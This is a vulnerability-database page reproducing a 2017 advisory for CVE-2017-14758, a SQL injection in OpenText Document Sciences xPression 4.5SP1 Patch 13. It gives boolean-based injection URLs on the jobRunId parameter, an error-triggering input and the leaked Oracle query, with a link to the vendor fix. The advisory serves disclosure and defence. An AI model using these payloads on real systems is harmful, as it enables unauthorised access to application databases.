Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMariusz Woloszyn1337DAY-ID-28678
HistorySep 30, 2017 - 12:00 a.m.

OpenText Document Sciences xPression 4.5SP1 Patch 13 SQL Injection Vulnerability

2017-09-3000:00:00
Mariusz Woloszyn
0day.today
27

EPSS

0.002

Percentile

55.6%

JSON

Exploit for java platform in category web applications

Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

SQL Injection:
==============

Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.

Vector :
--------

True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2

Additionally:

http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa

Results in the following error in response:

HTTP/1.1 200 OK
[...]
  <b>Errors:&nbps;</b>

  See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended

An attacker can see whole query and injection point. This can also be
used for error-based data extraction.

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

#  0day.today [2018-02-16]  #

Related

nvd 1
cvelist 1
zdt 1
packetstorm 1
exploitdb 1
cve 1
prion 1
exploitpack 1
nvd
nvd
CVE-2017-14758
2017-10-03 01:29:02
cvelist
cvelist
CVE-2017-14758
2017-10-02 17:00:00
zdt
zdt
OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection Vulnerability
2017-10-02 00:00:00
packetstorm
packetstorm
OpenText Document Sciences xPression 4.5SP1 Patch 13 SQL Injection
2017-09-29 00:00:00
exploitdb
exploitdb
OpenText Document Sciences xPression 4.5SP1 Patch 13 - &#039;documentId&#039; SQL Injection
2017-10-02 00:00:00
cve
cve
CVE-2017-14758
2017-10-03 01:29:02
prion
prion
Sql injection
2017-10-03 01:29:00
exploitpack
exploitpack
OpenText Document Sciences xPression 4.5SP1 Patch 13 - documentId SQL Injection
2017-10-02 00:00:00

EPSS

0.002

Percentile

55.6%

JSON
Related for 1337DAY-ID-28678
nvd1cvelist1zdt1packetstorm1exploitdb1cve1prion1exploitpack1